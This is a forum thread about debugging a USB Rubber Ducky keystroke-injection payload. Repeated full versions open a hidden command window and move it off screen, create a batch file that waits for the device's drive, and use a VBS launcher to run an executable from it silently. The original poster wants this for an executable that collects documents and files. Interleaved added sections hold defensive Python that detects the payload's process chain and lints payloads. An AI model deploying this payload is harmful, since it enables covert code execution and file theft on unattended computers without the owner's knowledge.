
[BugReport][Payload] Problem with runexe from sd card payload



I got the payload to work but not with the .exe file I need it to work with. It will auto open paint or a calculator exe file but not this certain .exe file I have. The .exe file I have auto extracts documents and computer files into a folder. I have no idea why it will not work with this .exe but will with any other I have tried. The payload executes everything fine but the .exe does not open.

This is the payload https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd

Any help would be great. Thanks.


I tried it with the batch payload I posted, and the target file does indeed create a Message.txt in the desired location on the target computer. So, the batch logic that waits for the drive to be mounted appears to be working.

C:\Windows\system32>erase /Q DuckyWait.bat

C:\Windows\system32>copy con DuckyWait.bat
:while1
for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
if Exist %myd% (
goto :break
)
timeout /t 30
goto :while1
:break
%myd%\MyExe.bat
^Z
        1 file(s) copied.

C:\Windows\system32>erase /Q invis.vbs

C:\Windows\system32>copy con invis.vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
^Z
        1 file(s) copied.

C:\Windows\system32>wscript.exe invis.vbs DuckyWait.bat

C:\Windows\system32>dir Message.txt
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Windows\system32

File Not Found

C:\Windows\system32>dir Message.txt
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Windows\system32

06/24/2013  02:07 PM                17 Message.txt
               1 File(s)             17 bytes
               0 Dir(s)  555,544,006,656 bytes free

C:\Windows\system32>

I also tried it with one of my Hello World executables, and observed that the output appears to either be suppressed, or is not launching the executable. I am trying to figure out which of the preceding scenarios is actually occurring.

Edited by overwraith

I got it, need to add the START command before the executable name on that line in the batch file, ex...

Line:

STRING %myd%\myEXE.bat

change to...

STRING START %myd%\myEXE.exe

Have now updated the payload to reflect this change.

Edited by overwraith

Looks like Git Hub added a few new lines where there wasn't supposed to be any. I think I deleted them all now. Look for lines that look like they are supposed to be on one line, but are divided into two lines. ex...

STRING HELLO
WORLD
ENTER

Here is another post of the payload I am using to launch my hello world executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER
Edited by overwraith
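The payload above leaves a fairly distinctive process chain on the target: an interactive cmd.exe started with /Q /D /T:7F /F:OFF /V:ON /K, wscript.exe running invis.vbs with a .bat argument, a hidden cmd.exe child polling wmic volume get driveletter, label, and finally an .exe launched from the root of the mounted drive. As an added example (not from any post in this thread), the Python below runs four such checks over constructed process-creation events. The event fields (pid, ppid, image, cmd) are an assumed reduction of a Sysmon Event ID 1 record, the rule names are mine, and the min_stages threshold is illustrative.

```python
"""Flag the process chain the RunEXE payload produces on the target.

Added example, not code from this thread. SAMPLE_EVENTS are constructed
process-creation records (pid, ppid, image, cmd); the field names are an
assumed reduction of a Sysmon Event ID 1 entry.
"""
import re

SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # GUI r, then the cmd line the Ducky types
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /Q /D /T:7F /F:OFF /V:ON /K"},
    # the invisible launcher
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": "wscript.exe invis.vbs DuckyWait.bat"},
    # WScript.Shell.Run of a .bat goes through a hidden cmd.exe
    {"pid": 4, "ppid": 3, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd /c ""C:\Users\u\AppData\Local\Temp\DuckyWait.bat" "'},
    # the polling loop
    {"pid": 5, "ppid": 4, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": "wmic volume get driveletter, label"},
    {"pid": 6, "ppid": 4, "image": r"C:\Windows\System32\findstr.exe",
     "cmd": 'findstr "DUCKY"'},
    # START %myd%\HelloWorld.exe once the drive is mounted
    {"pid": 7, "ppid": 4, "image": r"E:\HelloWorld.exe", "cmd": r"E:\HelloWorld.exe"},
    # benign noise: an admin running the same wmic query by hand
    {"pid": 8, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 9, "ppid": 8, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": "wmic volume get driveletter, label"},
]


def _name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(events_by_pid, pid):
    """Ancestor events of pid, nearest parent first (stops at the root or a loop)."""
    chain, seen = [], {pid}
    ev = events_by_pid.get(pid)
    while ev is not None and ev["ppid"] in events_by_pid and ev["ppid"] not in seen:
        ev = events_by_pid[ev["ppid"]]
        seen.add(ev["pid"])
        chain.append(ev)
    return chain


def detect(events):
    """Return [(pid, rule)] for every event that matches one stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name, cmd = _name(e["image"]), e["cmd"]
        anc = ancestors(by_pid, e["pid"])
        under_wscript = any(_name(a["image"]) == "wscript.exe" for a in anc)
        # Stage 1: the Run-dialog cmd with /K plus the /V:ON and /T: flags the payload types.
        if name == "cmd.exe" and all(f in cmd.upper() for f in ("/K", "/V:ON", "/T:")):
            findings.append((e["pid"], "cmd_run_dialog_flags"))
        # Stage 2: wscript.exe given a .vbs and a .bat on one command line.
        if name == "wscript.exe" and re.search(r"\.vbs\b.*\.bat\b", cmd, re.I):
            findings.append((e["pid"], "wscript_vbs_launches_bat"))
        # Stage 3: volume/drive-letter enumeration from a script-hosted batch.
        if name == "wmic.exe" and under_wscript and \
                re.search(r"\bvolume\b.*\bdriveletter\b", cmd, re.I):
            findings.append((e["pid"], "wmic_volume_poll_under_wscript"))
        # Stage 4: an .exe at the root of a non-system drive, parented by that hidden cmd.exe.
        m = re.match(r"^([A-Z]):\\[^\\]+\.exe$", e["image"], re.I)
        if m and m.group(1).upper() != "C" and under_wscript and anc \
                and _name(anc[0]["image"]) == "cmd.exe":
            findings.append((e["pid"], "exe_from_drive_root_via_hidden_batch"))
    return findings


def chain_detected(events, min_stages=3):
    """True when at least min_stages distinct stages of the chain are present."""
    return len({rule for _, rule in detect(events)}) >= min_stages
```

The admin's interactive wmic (pid 9) is not flagged because nothing in its ancestry is wscript.exe; the parent-chain check is what separates the payload's polling loop from ordinary use of the same command.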

I tried this out on another Windows 7 computer, and now I am getting the same error that you are. The computer is refusing to write to the System32 folder. I believe that this has something to do with windows firewall, or something. I don't know if I will be able to find a solution to this particular problem. Simply changing the output folder may solve this particular problem.

Edited by overwraith
Link to comment
Share on other sites

I wonder why the old code didn't have this problem but the new code does. I added STRING START %myd%\myEXE.exe in the old code but it did not work; however, it did not give me any errors like in the new code. Also, why would a different output folder affect it if it can not find the invis.vbs?


I am putting a change directory command in the code so it will switch to the temp directory. The System32 folder appears to now be write protected by some process on the Windows 7 system. If anyone knows what is write protecting it I would like to know. Here is the updated code; this should work. I have no idea why it is not allowing us to write there, my system allows it just fine.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

When I was having the error on the other computer I was talking about, copy con would act like it was going to work, and when I pressed enter to enter a line of code it hung, giving me an error about access being denied or something. Later on the script calls invis.vbs which consequently does not exist, which causes the popup box you posted. I actually didn't change that much in the code, the part that adds invis.vbs is exactly the same. I am betting that Microsoft rolled out some kind of a patch between testing the first version and the second version, which is why we are seeing different results. Whatever security setting is preventing the writing is probably turned off on my computer.

Edited by overwraith

I just tried the new code and it is still not working for me. I don't get the error any more but it will not run a notepad.exe renamed to HelloWorld like it did before or a HelloWorld.exe program. It does all that's in the picture but never runs the exit string for some reason and no program is run.

[screenshot: cmd_zps7dd2b60f.png]

If you need more details just ask, I don't see why it wouldn't be working for me.


Sorry, this one is my fault. Missed a couple of colons in the script. Will go back and change other payloads so other people don't copy and paste the mistake. Here is the script you want.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER
Edited by overwraith

I am sorry for the trouble you are having mahorelee. Unfortunately this script is fairly complex, and when I originally posted it online there were problems I still needed to iron out. I believe the script is now in working order, as it runs fine on my computer, so odds are the problem is on your end. Please post another picture of what the script does when it runs. Also, post which operating system you have. Also post what happens when you simply run the batch script by itself without the Visual Basic file making it execute silently. I will need a print screen of that.

EX...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\UserName>DuckyWait.bat

Here are also some things that could be going wrong.

-Make sure you have the right firmware (Twin duck)

-Make sure you are waiting for the ducky drive to mount, and after it mounts wait 1 minute at least.

-Make sure you are compiling and running on the same computer, so there are no architecture issues.

-Make sure you have a running executable file, and perhaps one you coded yourself. If you know C++, here is the hello world executable I am using at the bottom of the page. There is a copy file command in it so that it copies itself to the desktop when it runs, but I commented it out for you. If you use it, change the field UserName.

-Make sure the executable file is on the root of the ducky.

-Make sure you updated the text file with the source code in it.

-Make sure you copied the .inf file to the root of the drive

-Make sure you re-named the ducky drive "DUCKY"

#include <iostream>
#include <Windows.h>

using namespace std;

int main(){

    //CopyFileA("HelloWorld.exe", "C:\\Users\\UserName\\Desktop\\HelloWorld.exe",0);

    cout << "Hello World!!!" << endl;

    system("pause");
}//end main

I am still thinking about what this could be, so I will check back here frequently.


Okay thank you for your help.

I do have TwinDuck

I have left my Ducky in for a while each time so I do not think that is the problem

I am running on the same computer (Windows 7)

I do not know C++, I know Java and Python. But I have been using the default notepad exe file located on all windows and another exe I found. (I can make a hello world exe file with C++ if you think that would help, it would just take an hour or so)

The exe file is on the root (see picture)

Text file is updated

***I do not know what the .inf file is so that is not on the root of the Ducky. That might be the problem

Drive is renamed to DUCKY

The inject.bin is on the root of the drive too.

I will do troubleshooting and take screenshots here shortly if the .inf file is not the problem.

[screenshot: Duckusb_zps07c088ca.png]


I see what is going wrong now, when you copied and pasted it I think the website may have changed its formatting or something. In the for loop the 'd' should be a 'do'. Here is my output for the program.

[screenshot: DuckyWait_zps1a5c9f64.png]

[screenshot: HelloWorld_zps88812951.png]

You run the batch file simply by typing "DuckyWait.bat" into the command prompt.

Edited by overwraith
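Two of the failures in this thread come from the payload text being mangled in transit rather than from the logic: the GitHub copy gained line breaks that split a STRING onto a second line (overwraith's "STRING HELLO / WORLD" illustration earlier), and the pasted for loop lost the "do" ("d set myd=%%d", as diagnosed in the post just above). Both are mechanical enough to catch before encoding. As an added example (not code from any post here), the Python below lints a Ducky Script payload for a line that does not start with a known command, a for /f whose "do" is missing, a single-percent loop variable typed into a .bat via copy con, and a copy con never closed with CONTROL z. KNOWN is my subset of the classic encoder keywords plus a few common ones; the sample payload is constructed.

```python
"""Lint a Ducky Script payload for the copy-paste faults seen in this
thread: a STRING wrapped onto a second line, a batch for-loop whose "do"
was eaten, a single %x loop variable dictated into a .bat, and an
unterminated copy con.

Added example, not part of any post. KNOWN is an assumed subset of the
classic Ducky Script keywords; extend it for your encoder. The sample
payload is constructed.
"""
import re

KNOWN = {
    "REM", "STRING", "DELAY", "DEFAULT_DELAY", "DEFAULTDELAY", "REPEAT",
    "ENTER", "TAB", "SPACE", "ESCAPE", "ESC", "DELETE", "BACKSPACE",
    "GUI", "WINDOWS", "ALT", "CONTROL", "CTRL", "SHIFT", "MENU", "APP",
    "UPARROW", "DOWNARROW", "LEFTARROW", "RIGHTARROW", "HOME", "END",
    "PAGEUP", "PAGEDOWN", "INSERT", "CAPSLOCK", "NUMLOCK", "PRINTSCREEN",
}

# A for /f loop: skip to the closing paren of the set, then capture the
# word that ought to be "do".
FOR_F = re.compile(r"for\s+/f\b.*?\bin\s*\(.*\)\s*(\S+)", re.I)
# A lone %x loop variable; inside a .bat it has to be doubled to %%x.
SINGLE_PCT = re.compile(r"(?<!%)%[A-Za-z](?![A-Za-z0-9_%])")

SAMPLE_PAYLOAD = """\
REM constructed test payload
DELAY 1000
STRING copy con DuckyWait.bat
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') d set myd=%%d
ENTER
STRING HELLO
WORLD
ENTER
CONTROL z
ENTER
STRING copy con Other.bat
ENTER
STRING for /f %d in ('dir /b') do echo %d
ENTER
"""


def lint(payload):
    """Return [(line_number, code, message)] for each suspicious line."""
    findings = []
    lines = payload.splitlines()
    in_copy_con = False   # between "copy con <file>" and the CONTROL z that ends it
    batch_target = False  # the file being dictated is a .bat/.cmd
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line:
            continue
        keyword, _, rest = line.partition(" ")
        kw = keyword.upper()
        if kw not in KNOWN:
            findings.append((n, "wrapped_line",
                             f"'{keyword}' is not a Ducky command; probably the tail of line {n - 1}"))
            continue
        if kw in ("CONTROL", "CTRL") and rest.strip().lower() == "z":
            in_copy_con = False
            continue
        if kw != "STRING":
            continue
        m = re.match(r"copy\s+con\s+(\S+)", rest, re.I)
        if m:
            if in_copy_con:
                findings.append((n, "unterminated_copy_con",
                                 "previous copy con was never closed with CONTROL z"))
            in_copy_con = True
            batch_target = m.group(1).lower().endswith((".bat", ".cmd"))
            continue
        m = FOR_F.search(rest)
        if m:
            if m.group(1).lower() != "do":
                findings.append((n, "missing_do",
                                 f"for /f is followed by '{m.group(1)}' instead of 'do'"))
            if in_copy_con and batch_target and SINGLE_PCT.search(rest):
                findings.append((n, "single_percent",
                                 "loop variable must be %%x when typed into a .bat file"))
    if in_copy_con:
        findings.append((len(lines), "unterminated_copy_con",
                         "copy con at end of payload never closed with CONTROL z"))
    return findings
```

Run it on the payload text before encoding; anything reported as wrapped_line should be joined back onto the previous STRING, which is exactly the repair described above.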

I posted the wrong picture, that was from before. This is the new one.

[screenshot: cmd_zps7dd2b60f.png]

Here is what happens when I run DuckyWait.bat (How did I get that batch file in the first place?)

[screenshot: duckywait_zps10e8db0b.png]

When the ducky mounts on my computer it mounts as (E) for the record.


I have altered the payload posted earlier in this forum, please copy and paste the last one that I posted in this forum. Even if it looks like you already got the payload, I may have used the edit feature to change it. The last posting of the payload should correct your error.

There are colons missing in the copy that you got.

Also, my script uses the command line command "copy con" to generate DuckyWait.bat.

Edited by overwraith

It still does not run the exe. I tried going into the drive manually in the cmd and running it and it runs fine. So I do not know why it's not working. Is there any trouble shooting I can do for you that would help narrow down the problem?


You do not have the correct version of the code, copy and paste this in and it will work.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

And just in case it doesn't work here is a different version with a slight tweak.

REM Author: overwraith
REM Name: RunEXE_V2.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DUCKYdrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER
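Both drive lookups above, the wmic one in RunEXE.txt and the diskpart one in RunEXE_V2.txt, pipe through findstr "DUCKY", which is a substring match, and take a whitespace token from every matching line with the last match winning. That is fine when DUCKY is the only label containing that word and the volume has a letter; a second volume labelled MYDUCKY or an unlettered "DUCKY Backup" partition silently changes what gets stored in myd or DUCKYdrive. As an added example (not code from any post), the Python below parses both outputs by header column offset, resolves the letter with an exact label match, and beside that emulates what each batch one-liner actually sets. WMIC_SAMPLE and DISKPART_SAMPLE are constructed in the shape of wmic volume get driveletter, label and diskpart list volume output; the parsers assume that fixed-width layout.

```python
"""Find the DUCKY volume's drive letter from the two enumerations this
thread's batch files use, and reproduce what the batch one-liners pick
when other labels also contain "DUCKY".

Added example, not code from any post. The two samples are constructed to
look like 'wmic volume get driveletter, label' and diskpart 'list volume'
output; both parsers rely on the fixed-width columns of the header line.
"""

WMIC_SAMPLE = """\
DriveLetter  Label
C:
D:           MYDUCKY
E:           DUCKY
             DUCKY Backup
"""

DISKPART_SAMPLE = """\

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     D   MYDUCKY      UDF    DVD-ROM     4000 MB  Healthy
  Volume 1         System Rese  NTFS   Partition    100 MB  Healthy    System
  Volume 2     C                NTFS   Partition    465 GB  Healthy    Boot
  Volume 3     E   DUCKY        FAT32  Removable   1931 MB  Healthy
  Volume 4         DUCKY Backu  NTFS   Partition    200 GB  Healthy
"""


def parse_wmic_volumes(text):
    """[(letter or None, label)] using the header's Label column offset."""
    lines = [l for l in text.splitlines() if l.strip()]
    col = lines[0].index("Label")
    return [(l[:col].strip() or None, l[col:].strip()) for l in lines[1:]]


def parse_diskpart_volumes(text):
    """[(letter or None, label)] using the Ltr/Label/Fs header offsets.
    diskpart truncates labels to the column width, so compare short labels."""
    lines = text.splitlines()
    hdr = next(i for i, l in enumerate(lines) if "Ltr" in l and "Label" in l)
    ltr, lab, fs = (lines[hdr].index(c) for c in ("Ltr", "Label", "Fs"))
    rows = []
    for l in lines[hdr + 1:]:
        if not l.strip() or l.lstrip().startswith("-"):
            continue  # blank line or the dashed separator
        rows.append((l[ltr:lab].strip() or None, l[lab:fs].strip()))
    return rows


def find_drive(rows, label="DUCKY"):
    """Exact label match on a lettered volume; None if absent or ambiguous."""
    hits = [letter for letter, lab in rows if lab == label and letter]
    if len(hits) != 1:
        return None
    return hits[0].rstrip(":") + ":"


def batch_wmic_pick(text):
    """What  for /f %%d in ('wmic ... ^| findstr "DUCKY"') do set myd=%%d
    leaves in myd: first token of every matching line, last match wins."""
    myd = None
    for l in text.splitlines():
        if "DUCKY" in l and l.split():
            myd = l.split()[0]
    return myd


def batch_diskpart_pick(text):
    """What  for /f "tokens=3 delims= " %%A in ('... diskpart ^| findstr "DUCKY"')
    do (set DUCKYdrive=%%A:)  leaves in DUCKYdrive: third token, last match wins."""
    drive = None
    for l in text.splitlines():
        if "DUCKY" in l:
            tokens = l.split()
            if len(tokens) >= 3:
                drive = tokens[2] + ":"
    return drive
```

On these samples the column parsers both resolve E:, while the batch emulations end up with "DUCKY" and "DUCKY:" respectively because the unlettered backup volume is the last line findstr matches. In the batch loop that is not fatal (if Exist DUCKY fails and the loop just keeps polling), but it means the payload never launches; the practical fixes on the batch side are to anchor the label (findstr /R /C:" DUCKY$" style) and to require a letter-shaped token before trusting it.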
